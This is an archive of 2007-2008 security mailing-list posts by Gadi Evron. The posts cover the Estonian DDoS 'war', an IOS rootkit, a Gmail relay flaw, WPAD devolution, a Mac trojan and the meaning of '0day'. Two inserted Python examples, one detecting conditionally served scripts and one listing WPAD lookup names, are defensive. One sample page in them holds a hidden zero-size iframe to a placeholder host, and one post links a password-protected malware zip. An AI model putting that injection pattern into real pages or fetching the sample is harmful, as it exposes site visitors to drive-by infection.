doubt that there may have been addresses located in Russian IP-pools
attacking our government networks, but well we are professionals here, and
we do understand what do botnets mean, do we ?
What concerns the story about blogs and forum activities, well pardon, CNN
also showed pictures of happening in Estonia, so did BBC, EuroNews, MTV3
that gives me no arguments to claim that CNN is behind all that :)

More of that, living here, and working in the IT sector for a half of my
life I have noticed none of increasing hacker activity on my servers. (also
the company servers)
Neither did a lot of my friends here. In fact, yet I have not seen anyone,
except for some political party though, who would have suffered from so
called "cyber-war".
All those stories about banks going offline, etc. etc. etc. - well may I
tell you that my visa was working properly all the time, and my bank was
24/7 available.

This all led me to the conclusion, that all the hush is about a couple (ok,
maybe tens or hundreds) of DDoS attacks being done.
Tell me, how many attacks or ok, attack attempts does your corporate network
suffer during the day ?

What concerns that student you wrote about, well, Gadi please, as far as I
know that was a ping-of-death he committed against the server of one
political party.
And well, if your server goes offline due to a ping of death, then please,
you have security issues, and serious ones... And for me, the story about
"ugly russian hackers" in this context sounds more than hilarious for me.
The more ridiculous it gets if one tries to make an international disaster
of one "lazy admin forgetting to install a firewall".
Give me a break...

In general, a lot of IT experts around here, are concerned that no
"cyber-war" has ever happened, everything was going about a couple, maybe
10-20 DDoS attacks which took place, and sleeping admins off duty.
And what concerns the security situation here in Estonia, well I should
agree with you that, yes, our banks have the security which we may trust,
well at least from my point of view. But if we go to the government level,
then please...
You don't even need to be a cracker know-it-all of any kind, a plain
script-kiddie skill will do the trick...e.g. recently checking out one
software package for security breaches we have found a key to a some of 100
Estonian government websites + web server user privileges on the boxes
itself...it took us 15 minutes not even being a security-expert of any sort.
Fortunately for the government we are the good guys. :)

Generally, pardon Gadi but, your story copies 1:1 the story the officials
tell everybody, and well sorry but mr. Toomas Hendrik-Ilves'es IT skills
leave me in a very grand doubt. So does the story he has no evidence for.
So far the online community has seen none of the evidence the government was
boasting about, a year has gone by - and personally I consider all this a
one big bluff.


Dear Viktor. thank you for sharing your experience and your personal point 
of view, I appreciate that.


As to the banks, indeed actual, eventual, down-time was non-consequential 
(for some, 2 hours) while others still did not process credit card 
requests a month later. All-in-all incident response made sure people in 
the streets only found out about certain issues through the press.


As to the technical evidence, indeed, the attacks, while sizable (c'mon, 
4mpps is still big) are almost insignificant when compared with the size of 
attacks we have seen in the past. Very small in comparison.


I refuse to take a stand or offer an opinion (anymore) on if it was Russia 
or not, I convey only what I can prove, which on that regard is absolutely 
nothing except for the fact it was organized, ad-hoc or by an entity, you 
can decide for yourself.


It is not my place to take sides or comment politically, DDoS hurts the 
`net, no matter who is under attack, and that is why the Internet security 
operations community and the CERTs community got involved, as well as 
myself.


Thanks again,

Gadi.


An account of the Estonian Internet War

2008-05-20 Thread Gadi Evron
About a year ago after coming back from Estonia I promised I'd send in an 
account of the Estonian "war". The postmortem analysis and recommendations 
I later wrote for the Estonian CERT are not yet public.


A few months ago I wrote an article for the Georgetown Journal of 
International Affairs, covering the story of what happened there, in 
depth. The journal owns the copyright so I had no way of sending that 
along either. I wasn't about to email saying "go buy a copy".


Mostly silly articles kept popping up with misguided to wrong information 
about what happened in Estonia, and when an Estonian student was arrested 
for participating, some in our community even jumped up to say "it was 
just some student". Ridiculous.


This is the "war" that made politicians aware of cyber security and entire 
countries scared, NATO to "respond" and the US to send in "help". 
It deserved a better understanding for that alone, whatever actually 
happened there.


I was there to help, but I just deliver the account. The heroes of the 
story are the Estonian ISP and banking security professionals and the 
CERT (Hillar Aarelaid and Aivar Jaakson).


Apparently the Journal made my article available in PDF form by a third 
party:


Battling Botnets and Online Mobs
Estonia's Defense Efforts during the Internet War

URL: http://www.ciaonet.org/journals/gjia/v9i1/699.pdf

It is not technical, I hope you find it useful.

Gadi Evron.


IOS rootkits

2008-05-17 Thread Gadi Evron
At the upcoming EuSecWest Sebastian Muniz will apparently unveil an IOS 
rootkit. Skip below for the news item itself.


We've had discussions on this before, here and elsewhere. I've been heavily 
attacked on the subject of considering router security as an issue when 
compared to routing security.


I have a lot to say about this, looking into this threat for a few years now 
and having engaged different organizations within Cisco on the subject in the 
past.  Due to what I refer to as an "NDA of honour" I will just relay the 
following until it is "officially" public, then consider what should be made 
public, including:


1. Current defense strategies possible with Cisco gear
2. Third party defense strategies (yes, they now exist)
3. Cisco response (no names or exact quotes will likely be given)
4. A bet on when such a rootkit would be public, and who won it (participants 
are.. "relevant people").


From:
http://www.networkworld.com/news/2008/051408-hacker-writes-rootkit-for-ciscos.html

"A security researcher has developed malicious rootkit software for Cisco's 
routers, a development that has placed increasing scrutiny on the routers that 
carry the majority of the Internet's traffic.


Sebastian Muniz, a researcher with Core Security Technologies, developed the 
software, which he will unveil on May 22 at the EuSecWest conference in London. "


Gadi Evron.


Re: Exploiting Google MX servers as Open SMTP Relays

2008-05-10 Thread Gadi Evron

On Wed, 7 May 2008 [EMAIL PROTECTED] wrote:


Vulnerability Report:

As part of our recent work on the trust hierarchy that exists among email 
providers throughout the Internet, we have uncovered a serious security flaw in 
Google's free email service, Gmail. This vulnerability exposes Google's email 
servers in a way that allows an attacker to use them as open spam and phishing 
relays. This issue is related to the risk of a malicious user abusing Gmail's 
email forwarding functionality. This is possible because Gmail's email 
forwarding functionality does not impose proper security restrictions during 
its setup process and can be easily subverted. By exploiting this problem an 
attacker can send unlimited spam and phishing (i.e. forged) email messages that 
are delivered by Google's very own SMTP servers. Since the messages are 
delivered by Google's own servers, an attack based on this flaw is able to 
bypass all spam filters that are based on the blacklist / whitelist concept. We 
were able to confirm that this vulnerability is indeed exploitable by 
crafting a proof of concept attack that allowed us to send any number of 
forged email messages without restriction through Google's server 
infrastructure. We have also verified that this flaw allows attackers to bypass 
spam filters by using our method to send messages that are usually flagged as 
spam. While sending these messages directly from our network in the traditional 
way had the messages classified as spam, by sending the very same messages 
using our exploit, the messages were delivered directly to the victim's inbox, 
thus bypassing filters.

Impact:

All email providers that offer Google's SMTP servers any special level of trust 
(e.g. whitelist status) are vulnerable.


A lot of spam is currently being sent that way.

Gadi.



Disclosure:
We have contacted Google about this issue and are waiting for their position 
before releasing further details.

For more information, visit our homepage:
http://ece.uprm.edu/~andre/insert


Regards,


Pablo Ximenes, André dos Santos

INSERT - Information Security Research Team
University of PR at Mayaguez (UPRM), USA
State University of Ceará (UECE), Brazil

[EMAIL PROTECTED], [EMAIL PROTECTED]


hacking a pacemaker

2008-03-12 Thread Gadi Evron
Almost a year ago I gave a talk at the CCC Camp in Germany I called "hacking 
the bionic man". It even made Wired, in some fashion.

http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html
http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html

In the talk, among other things such as the DNA and scripting languages, 
medical doctors and reverse engineers...  was about cybernetic hacking.
I gave some predictions, some for 2 years, others 40 years. Some again were 
pure science fiction. I was wrong on the 2 years, it's here.


Today, this came up in the news (hat tip to Paul Ferguson on the funsec mailing 
list):

http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1&oref=slogin

" The threat seems largely theoretical. But a team of computer security 
researchers plans to report Wednesday that it had been able to gain wireless 
access to a combination heart defibrillator and pacemaker.


They were able to reprogram it to shut down and to deliver jolts of electricity 
that would potentially be fatal, if the device had been in a person. In this 
case, the researchers were hacking into a device in a laboratory. "


Gadi Evron.


Re: [Full-disclosure] what is this?

2008-01-15 Thread Gadi Evron

On Tue, 15 Jan 2008, crazy frog crazy frog wrote:

nick,
ur not getting my point,the url is techicorner.com/{random string
here},i have already mentioned it in previous posts.
i have read the link sent by denis,and i would have to conclude that:
1)The problem does not occur always,instead it occurs randomly based
on IP or something like that.


In recent kits, it is more likely it is user-agent based.


2)if u look at the pages on techicorner.com u will not find any
malicious code,so its possible that the server is compromised and its
an LKM
please refer to these links:
http://www.webhostingtalk.com/showthread.php?t=651748 [thanks denis]

Thanks again everyone for your valuable suggestion,i posted here to
share this stuff with everyone and may be u can learn from it.

regards,
_CF

On Jan 15, 2008 12:15 PM, Nick FitzGerald <[EMAIL PROTECTED]> wrote:

crazy frog crazy frog wrote:


well,
i received many responses but no one is perfect.i checked the files and
didn't find anything embedded in my scripts or pages.still i have to
figure out why my antivirus randomly pops up?i mean most of the times
it doesnt detect any infection but then suddenly this thing happens
and then everything seems ok.
i dont think its a problem with my script otherwise i could have found
the code or it should be repeating consistently.is anyone still facing
this issue in the techicorner.com or on tubeley.com or on
secgeeks.com?

let me know i m trying hard to dig this issue.


If you would tell us the _actual_ URL where this behaviour is being
seen we would have a reasonable chance of actually diagnosing it.  As
it is, we're having to guess based on matching your half-arsed
descriptions of what you think is happening with our knowledge of what
has been seen going on out there.

This may surprise you, but many thousands and thousands of sites are
compromised each day to display "similar" activity to what you've asked
to us to diagnose (aka "guess").

If we could look at the actual site and see what is really happening
should have a better (if not perfect) chance of success.


Regards,

Nick FitzGerald


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
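
One way for a site operator to test for the conditional serving discussed in this thread (injected content that only appears for some visitors, by user-agent in recent kits), as an added example that is not part of the original thread: a Python check that extracts the script/iframe references from page bodies fetched under several User-Agent strings and reports anything present for one agent but absent from a baseline. The response bodies here are constructed inline so the check runs offline; in practice they would be the bodies returned by your own server for each User-Agent. The hostname example.invalid is a placeholder.

```python
"""Spot user-agent-conditional script/iframe injection by diffing responses.

Added example, not code from the original thread. The page bodies below are
constructed samples standing in for what a site operator would fetch from
their own server with several User-Agent strings; example.invalid is a
placeholder, not a real site.
"""
from html.parser import HTMLParser


class _RefCollector(HTMLParser):
    """Collect (tag, url) pairs for elements that pull in external content."""

    WATCHED = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.refs = set()

    def handle_starttag(self, tag, attrs):
        want = self.WATCHED.get(tag)
        if want is None:
            return
        for key, value in attrs:
            if key == want and value:
                self.refs.add((tag, value.strip()))


def external_refs(html):
    """Return the set of (tag, url) references found in an HTML body."""
    collector = _RefCollector()
    collector.feed(html)
    return collector.refs


def conditional_injections(responses, baseline_ua):
    """Map user-agent -> references served to it but absent from the baseline.

    'responses' maps a User-Agent string to the body served for it. On a
    clean site this returns an empty dict: the set of script/iframe sources
    must not depend on who is asking.
    """
    baseline = external_refs(responses[baseline_ua])
    findings = {}
    for ua, body in responses.items():
        if ua == baseline_ua:
            continue
        extra = external_refs(body) - baseline
        if extra:
            findings[ua] = sorted(extra)
    return findings


# Constructed sample: the site's own page, and the same page with a hidden
# iframe appended only when a browser-looking User-Agent asks for it.
CLEAN_PAGE = (
    '<html><head><script src="/js/site.js"></script></head>'
    '<body><h1>Welcome</h1></body></html>'
)
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://example.invalid/in.cgi?3" width="0" height="0">'
    "</iframe></body>",
)
SAMPLE_RESPONSES = {
    "curl/7.16.0": CLEAN_PAGE,
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)": INJECTED_PAGE,
    "Wget/1.10": CLEAN_PAGE,
}


def scan_sample():
    """Run the check on the constructed sample, using curl as the baseline."""
    return conditional_injections(SAMPLE_RESPONSES, "curl/7.16.0")


if __name__ == "__main__":
    for ua, refs in scan_sample().items():
        print("%s:" % ua)
        for tag, url in refs:
            print("    <%s> %s" % (tag, url))
```

The baseline is a non-browser agent on purpose: kits that key on the User-Agent tend to leave such requests clean, which is why a manual review of the served files can look fine. As the thread also notes, serving may instead vary by source IP or appear only intermittently, so a single pass is not conclusive; repeat the fetches over time and from more than one network, and diff against the files actually on disk as well.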



Re: what is this?

2008-01-14 Thread Gadi Evron

Hi,

Recently on opening one of my site,my antivirus pops up saying that it
has found a malicious script.the url is random and i have managed to
get that script.it is using some flaw in apple quick time.
u can get the zip file for java script here:
http://secgeeks.com/what.zip
password is 12345
can somebody guide/help me what is this and how can i remove it?


I did not look at the malware, but it is pretty obvious you have been 
compromised.


Defacements today (unless for specific reason of being "seen") are about 
leaving the site the same way you find it, and infecting its user 
base/visitors.


A second option is that you are secure but a "partner" such as ad sites 
has been compromised and infects your users.


Naturally, a compromise can come from anywhere, but in most cases it is 
something like RFI... Taosecurity linked to three great papers on the 
subject of web botnets / cross-platform web malware:

http://taosecurity.blogspot.com/2007/11/great-papers-from-honeynet-project.html

Linking also to my original article here:
http://blogs.securiteam.com/index.php/archives/815

Gadi.


Re: [dns-operations] Web Proxy Auto-Discovery (WPAD) Information Disclosure (fwd)

2007-12-04 Thread Gadi Evron



-- Forwarded message --
Date: Tue, 4 Dec 2007 00:56:51 -0600 (CST)
From: Gadi Evron <[EMAIL PROTECTED]>
To: Rickard Dahlstrand <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: [dns-operations] Web Proxy Auto-Discovery (WPAD) Information
Disclosure

On Tue, 4 Dec 2007, Rickard Dahlstrand wrote:

Gadi Evron wrote:

http://www.microsoft.com/technet/security/advisory/945713.mspx

A malicious user could host a WPAD server, potentially establishing it as
a proxy server to conduct man-in-the-middle attacks against customers
whose domains are registered as a subdomain to a second-level domain
(SLD). For customers with a primary DNS suffix configured, the DNS
resolver in Windows will attempt to resolve an unqualified .wpad. hostname
using each sub-domain in the DNS suffix until a second-level domain is
reached. For example, if the DNS suffix is corp.contoso.co.us and an
attempt is made to resolve an unqualified hostname of wpad, the DNS
resolver will try wpad.corp.contoso.co.us. If that is not found, it will
try, via DNS devolution, to resolve wpad.contoso.co.us. If that is not
found, it will try to resolve wpad.co.us, which is outside of the
contoso.co.us domain.


Most of the wpad.tld domains are already reserved like this one
http://wpad.com/ It's amazing that when they fixed it for .com etc. a
while back they missed that there were two-level tld-domains.

Rickard.



http://www.microsoft.com/technet/security/bulletin/fq99-054.mspx
-
What's the problem with the search algorithm?
When IE 5 starts, it will begin searching for a WPAD server, if it is 
configured to use WPAD. It starts the search by adding the hostname "WPAD" to 
current fully-qualified domain name. For instance, a client in 
a.b.Microsoft.com would search for a WPAD server at wpad.a.b.microsoft.com. If 
it could not locate one, it would remove the bottom-most domain and try again; 
for instance, it would try wpad.b.microsoft.com next. IE 5 would stop searching 
when it found a WPAD server or reached the third-level domain, 
wpad.microsoft.com.
The algorithm stops at the third level in order to not search outside of the 
current network. However, for international sites, this is not sufficient, 
because third-level domains can be outside the current network. For example, if 
the network at xyz.com.au did not have a WPAD server, the search algorithm 
eventually would reach wpad.com.au, which is an external network name. If the 
owner of wpad.com.au set up a WPAD server, he or she could provide chosen proxy 
server configuration settings to the clients at xyz.com.au. For that matter, 
any network in com.au that didn't have its own WPAD server but did have WPAD 
enabled in its web clients also would also resolve to wpad.com.au.

-

From the FAQ for the 1999 fix...


It is quite possible, and we can assume (until someone tells us they know), 
that they fixed it for ccTLDs as well, and then re-introduced the flaw somehow.


Also:
http://www.wlug.org.nz/WPAD
-
(BeauButler?: I have registered wpad.co.nz, and do not intend to be 'really 
nasty'. I am collecting the 404 logs with the intention to produce some nice 
charts, however. Also, the wpad organisational-boundaries bug appears to have 
resurfaced in Internet Explorer 7!!)

-
Beau Butler is the guy who got all the press by talking about this at kiwicon 
last week:

https://kiwicon.org/presentations#oddy

This is the story that got Microsoft's attention:
http://www.theage.com.au/news/technology/flaw-leaves-microsoft-looking-like-a-turkey/2007/11/23/1195975914416.html
Which is where Beau says there are ~160,000 exploitable machines in NZ alone. 
He would *supposedly* know since he has the wpad.co.nz domain.


Whether it is a major issue or not, misconfigurations happen, heck, shit 
happens. I'd think we should watch for this and get that domain 
registered/monitored at different ccTLDs.


Gadi.
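
The devolution search described in the advisory and in the 1999 FAQ quoted above, as an added example that is not part of the original thread: a Python script that lists the wpad.* names a client with a given primary DNS suffix would query, and flags those that fall outside the organization's own domain. The organizational boundary (org_domain) is an assumption supplied by the caller; the DNS suffixes used are the ones quoted in the thread.

```python
"""Enumerate WPAD devolution candidates and flag those outside the org boundary.

Added example, not code from the original thread. The 'org_domain' boundary
is an assumption supplied by the caller (the domain the organization itself
owns); the DNS suffixes used below are the ones quoted in the advisory and
in the 1999 FAQ.
"""


def wpad_candidates(dns_suffix, min_labels=2):
    """Return the wpad.* names tried by DNS devolution, longest first.

    The resolver prepends 'wpad' to the primary DNS suffix, then strips one
    leading label at a time. The advisory text stops once a second-level
    domain is reached, which is min_labels=2 here (co.us, com.au and
    microsoft.com are all two labels from the algorithm's point of view).
    """
    labels = [lab for lab in dns_suffix.lower().strip(".").split(".") if lab]
    candidates = []
    while len(labels) >= min_labels:
        candidates.append("wpad." + ".".join(labels))
        labels = labels[1:]
    return candidates


def is_within(name, org_domain):
    """True if 'name' is the org domain itself or a subdomain of it."""
    name = name.lower().strip(".")
    org = org_domain.lower().strip(".")
    return name == org or name.endswith("." + org)


def unsafe_candidates(dns_suffix, org_domain):
    """Candidates that devolution would query outside the organization.

    Any name returned here is one a third party could register (wpad.co.us,
    wpad.com.au, ...) and thereby hand proxy settings to every auto-detecting
    client carrying that suffix, unless the organization answers for wpad
    inside its own zone first.
    """
    return [c for c in wpad_candidates(dns_suffix)
            if not is_within(c, org_domain)]


def report(dns_suffix, org_domain):
    """Human-readable summary for one suffix/boundary pair."""
    lines = ["suffix %s (boundary %s):" % (dns_suffix, org_domain)]
    for c in wpad_candidates(dns_suffix):
        flag = "ok" if is_within(c, org_domain) else "OUTSIDE"
        lines.append("  %-28s %s" % (c, flag))
    return "\n".join(lines)


if __name__ == "__main__":
    # Suffix / boundary pairs taken from the advisory and FAQ quoted above.
    for suffix, org in [("corp.contoso.co.us", "contoso.co.us"),
                        ("a.b.microsoft.com", "microsoft.com"),
                        ("xyz.com.au", "xyz.com.au")]:
        print(report(suffix, org))
```

The two mitigations the thread itself points at follow directly from the output: if unsafe_candidates is non-empty for your suffix, either make sure a wpad record exists inside your own zone so the search never devolves past it, or have the external names registered and monitored (which is what the wpad.co.nz registration above amounts to).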


Re: [Full-disclosure] Warning: Hackers hijacking unused IP Addresses inside Trusted domains [POC]

2007-11-21 Thread Gadi Evron

On Wed, 21 Nov 2007, Paul Schmehl wrote:
If Yahoo was able to fix the problem quickly, then it would appear that Yahoo 
had a compromised domain server or servers.


We all get pwned at one point or another, how we respond is what matters.




--
Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



RE: mac trojan in-the-wild

2007-11-02 Thread Gadi Evron

On Thu, 1 Nov 2007, Jim Harrison wrote:

While Apple-oriented threats may not get either the validation or the publicity 
(on hardly equals the other) that Windows attacks do, it's hardly accurate 
(much less fair) to make those comparisons.
For all those comparative points, my Kaypro-4 running ZCPR is more secure than 
any Apple OS.



The comparison is of the Microsoft eco-system in the security realm when 
Windows 98 was out. Whether by lack of visibility, unpatched exploits or 
organized criminal interest.


That is the significant part.

Gadi.


the heart of the problem [was: RE: mac trojan in-the-wild]

2007-11-02 Thread Gadi Evron

On Thu, 1 Nov 2007, Thor (Hammer of God) wrote:

But more importantly, let's look at things from the other side.  Let's
say I'm wrong, and that Gadi is right on target with his "hit hard"


I'd say we are both right.
You look at it from a security researcher stand-point. There is nothing 
interesting about user-interaction, and it is even kind of lame.


From a reasonable perspective, we refuse to believe people will act so .. 
silly.


prediction and that we should be very concerned with this.  Given the


Not predicting, assessing.

Criminal elements have a very clear cost/benefit calculation. For example, 
they won't release a 0day such as WMF or ANI as long as their revenue 
goals are met with published ones. They collect statistics on OS, browser, 
language, which exploit got how many, etc.


They have thousands on thousands of sites infecting users who surf (some 
of them ad-based on real sites, or defaced sites such as forums that 
remain with the same content only now infect people). Then there is also 
spam directing people to these sites.


Now, a criminal gang (could be the mob could be one guy) targets the mac. 
So much so that they serve different malware by OS-type.


As a security researcher looking at code, bits and bytes, you are simply 
not usually following what's going on in operational security where things 
are bleak.


From an operational security standpoint, this equates to what happened in 
the world of the Internet back when Windows 98 was around. Not what 
security features it had.



requirements here, that again being flagrant ignorance where all the
above steps are executed (including the explicit admin part)-- what
exactly are we supposed to do?  If people are willing and able to go
through the motions above what can we as security people do to prevent
it?  Far too many people in this industry are far too quick to point out
how desperate the situation is at all turns, but I don't see many people
offering real solutions.  But you know, I have to say...  If we are


Things are in fact FUBAR. We need new ideas and new solutions as honestly, 
although we want to feel we make a difference by taking care of this or 
that malware or this and that C&C we are powerless and have not made a 
real difference in the past 6 years while things got worse.


We need new solutions and new ideas, and would be more than happy to have 
new people exploring operational security.


The current state of Internet security is you get slapped -- BAM! -- and 
you write an analysis about it. (when speaking at ISOI I actually slapped 
myself -- HARD -- when I said it on stage, not a good idea for future 
reference).



really going to consider this "serious," and we are really going to
define part of our jobs as being responsible for stopping people who
have absolutely no concerns for what they do and are willing to enter
their admin credentials into any box that asks for it, then I'd say that
there is a *serious* misunderstanding about what security is, and what
can be done about it-- either that, or I'm just in the wrong business.

t


Well, we can't choose the risks. They choose us. Sometimes they are cool, 
sometimes they're not.


I often start emails by saying "first off, this is not the end of the 
world, the Sun will rise tomorrow and the Internet won't die today". I 
tire of it. Of course the Internet won't die today, but it is Mac season.


Apple is very much correct by not investing in security first until now -- 
from a BUSINESS standpoint, however much we as security people in our 
niche can't get behind it. Things are different now and unfortunately they 
have a backlog to deal with.


Gadi.


Re: [botnets] re MAC trojan (fwd)

2007-11-02 Thread Gadi Evron
There have been many threads on this subject, but I believe this post 
below covers what some of us are trying to say on why this issue is 
significant.


Obviously some people are far more articulate than me.


-- Forwarded message --
Date: Thu, 1 Nov 2007 16:47:17 -0400
From: PinkFreud <[EMAIL PROTECTED]>
To: Gary Flynn <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: [botnets] re MAC trojan

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
[My apologies if this has already been covered - I started this email a
few hours ago, and haven't had a chance to finish it until now.]


I think the point Gadi (and Alex of Sunbelt Software, in his original
blog entry) is trying to make is that professional malware authors have
begun to take notice of Apple.  As a piece of malware goes, this trojan
is nothing remarkable in itself, other than the fact that it's aimed at
Mac users.

As Gadi mentioned, there are a number of known issues that Apple has
yet to address.  If the professional malware authors are now taking aim
at Mac users, Apple appears to be making it easy for them.

There are a few comments that I've seen in this thread that are rather
worrisome:

::: Interspace System Department

Relax. MAC users are not that stupid as MS users...


Are you a Mac user?  If so, you just proved yourself wrong with that
statement.  :)

Users are users, and their knowledge of computers varies greatly from
one to the next.  I've supported a number of Mac users who tend to be
clueless when it comes to computers, and I've supported Mac users who
know quite a bit about the machines they use.  Like any Windows or *nix
user, Mac users can - and will - fall prey to this kind of scheme.

Again, the trojan is not what's important here.  The fact that it was
written for Macs is particularly noteworthy, however.


::: Jeremy Chatfield

InfoSec is there to make sure that I can run my business, not as an end in
itself. It *prevents* profit making activity by having effort expended on
internal needs. So if the Mac hasn't *needed* higher level of security
hoops, previously, that's good. So long as weaknesses are fixed *when
needed*, I'm a happy bunny. If there's a Day Zero attack that hits a Mac,
I'll be disappointed, but it's not a uniquely Mac situation to be in... If
the failure was an obvious weakness, I'm actually still pretty sanguine,
because it hasn't yet been exploited, despite being "well known".


Security issues should be fixed as soon as feasible, not 'when needed'.
If all security vulnerabilities were fixed 'when needed', the malware
authors would be having a field day (which, of course, implies they're
not already... h.).

Apple has a history of badly-written software.  As far as recent
examples go, take a look at tar and rsync on Tiger (10.4) - they've
been modified to support extended attributes like ACLs and resource
forks, and they're quite broken - extended attribute support introduces
a serious memory leak.

If that doesn't quite hit home, you can get a further idea of how their
software is written by taking a look at the man page for sharing(1), on
OS X Server (for those of you without access to OS X Server, take a
look at
http://developer.apple.com/DOCUMENTATION/Darwin/Reference/ManPages/man1/sharing.1.html
).  Pay particular attention to the description for the -s, -g, and -i
options - do their developers (or tech writers) know the difference
between AND and OR?  :)



On Thu, Nov 01, 2007 at 08:56:22AM -0400, Gary Flynn babbled thus:

This is nothing more than simple downloadable malware exacerbated
somewhat by permissive configuration settings. It exploits no
security defects.

As I understand it, the operator is given multiple opportunities
to refuse the program:

http://www.jmu.edu/computing/security/#macmalware

(I'm only subscribed to the archive so I apologize if this
  has been already pointed out or already proven incorrect
  today)

--
Gary Flynn
Security Engineer
James Madison University
www.jmu.edu/computing/security


--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


mac trojan in-the-wild

2007-11-01 Thread Gadi Evron
For whoever didn't hear, there is a Macintosh trojan in-the-wild being 
dropped, infecting mac users.
Yes, it is being done by a regular online gang--itw--it is not yet another 
proof of concept. The same gang infects Windows machines as well, just 
that now they also target macs.


http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html
http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html

This means one thing: Apple's day has finally come and Apple users are 
going to get hit hard. All those unpatched vulnerabilities from years past 
are going to bite them in the behind.


I can sum it up in one sentence: OS X is the new Windows 98. Investing in
security ONLY as a last resort loses money, but everyone has to learn it
for themselves.


Gadi Evron.


Re: defining 0day

2007-09-25 Thread Gadi Evron

On Wed, 26 Sep 2007, Charles Miller wrote:

On 26/09/2007, at 5:02 AM, Gadi Evron wrote:

Okay. I think we exhausted the different views, and maybe we are now able
to come to a conclusion on what we WANT 0day to mean.


What do you, as professional, believe 0day should mean, regardless of 
previous definitions?


As a professional, I would be happy to see terms like '0day' banished from 
the lexicon entirely. It's an essentially meaningless -- all third-party 
exploits are zero-day to _somebody_ -- term of boast co-opted from the warez 
scene, and we can do perfectly well without it.


Quibbling over its precise definition seems a ridiculous waste of bytes.



It would if we are to stay stuck in our niche, but you need to remember - 
security is about niches, we are all experts -- but in very specific 
fields.


These past 2 years we faced multiple targeted attacks with previously
unknown vulnerabilities. We experience MASSIVE exploitation of users with
0days used on web sites and in e-mail, etc.


As an industry, as professionals, it is time to get our act together on 
the basics.


I am operations manager for ZERT, and for me, this is indeed at the very 
heart of the matter. How you define this silliness is directly linked to 
how you do two of the most essential parts of security:


1. Vulnerability disclosure - for researchers.

2. Incident response - for.. responders.

If a vulnerability is fully disclosed, unpatched, being actively exploited,
etc. caused real confusion, and none of us, or any of the written material,
can agree on the basics.


It's not about fighting on what 0day means as much as it is about how we 
as an industry, a community, conduct ourselves and can reach a common 
language, which directly impacts operations.


So, if WMF was disclosed today after being actively exploited itw for a 
while, what would you call it? How would you respond to it? How long would 
it stay unpatched and when will you realize its importance?



C


Gadi.


Re: defining 0day

2007-09-25 Thread Gadi Evron

On Tue, 25 Sep 2007, Brian Loe wrote:

On 9/25/07, Gadi Evron <[EMAIL PROTECTED]> wrote:


Okay. I think we exhausted the different views, and maybe we are now able
to come to a conclusion on what we WANT 0day to mean.

What do you, as professional, believe 0day should mean, regardless of
previous definitions?



Seems to me that definitions, and language itself, is a product of
evolution. You can't just remove all previous meanings. Its better
anyway to stick to the most accepted, acknowledged and DOCUMENTED
definitions:


No longer good enough.

We can get a press scare over a public vuln release, or a wake-up call.

I think we can do better as an industry.


defining 0day

2007-09-25 Thread Gadi Evron

On Tue, 25 Sep 2007, Thor (Hammer of God) wrote:

For the record, the original term "O-Day" was coined by a dyslexic
security engineer who listened to too much Harry Belafonte while working
all night on a drink of rum.  It's true.  Really.

t


Okay. I think we exhausted the different views, and maybe we are now able
to come to a conclusion on what we WANT 0day to mean.


What do you, as professional, believe 0day should mean, regardless of 
previous definitions?


Obviously, the term has become charged in the past couple of years with 
the targeted office vulnerabilities attacks, WMF, ANI, etc.


We require a term to address these, just as much as we do "unpatched 
vulnerability" or "fully disclosed vulnerability".


What other such descriptions should we consider before proceeding? 
non-disclosure?


Gadi.


Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-21 Thread Gadi Evron

On Thu, 20 Sep 2007, Joey Mengele wrote:

Dear Fatboy,

Let's put aside for a minute the fact that you have no idea what


You like people on the heavy side? Psst... call me.



you are talking about and let's also, for the benefit of this very
valuable debate, assume your definition is correct. First, please
prove this bug was never used in the wild. After that, please prove
your credibility in the realm of defining words related to illegal
computer hacking. Thanks.

J

P.S. Talking about botnets doesn't count to satisfy part 1 OR part 2

___
"If today I stand here as a revolutionary, it is as a revolutionary
against the Revolution."


On Thu, 20 Sep 2007 11:29:22 -0400 Gadi Evron <[EMAIL PROTECTED]>
wrote:

Impressive vulnerability, new. Not a 0day.

Not to start an argument again, but fact is, people stop calling
everything a 0day unless it is, say WMF, ANI, etc. exploited in
the wild without being known.

I don't like the mis-use of this buzzword.

Gadi.


On Thu, 20 Sep 2007, pdp (architect) wrote:


http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability:
Adobe Acrobat/Reader PDF documents can be used to compromise your
Windows box. Completely!!! Invisibly and unwillingly!!! All it takes
is to open a PDF document or stumble across a page which embeds one.

The issue is quite critical given the fact that PDF documents are in
the core of today's modern business. This and the fact that it may
take a while for Adobe to fix their closed source product, are the
reasons why I am not going to publish any POCs. You have to take my
word for it. The POCs will be released when an update is available.

Adobe's representatives can contact me from the usual place. My advice
for you is not to open any PDF files (locally or remotely). Other PDF
viewers might be vulnerable too. The issue was verified on Windows XP
SP2 with the latest Adobe Reader 8.1, although previous versions and
other setups are also affected.

A formal summary and conclusion of the GNUCITIZEN bug hunt to be
expected soon.


cheers

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





Re: 0day: PDF pwns Windows

2007-09-20 Thread Gadi Evron

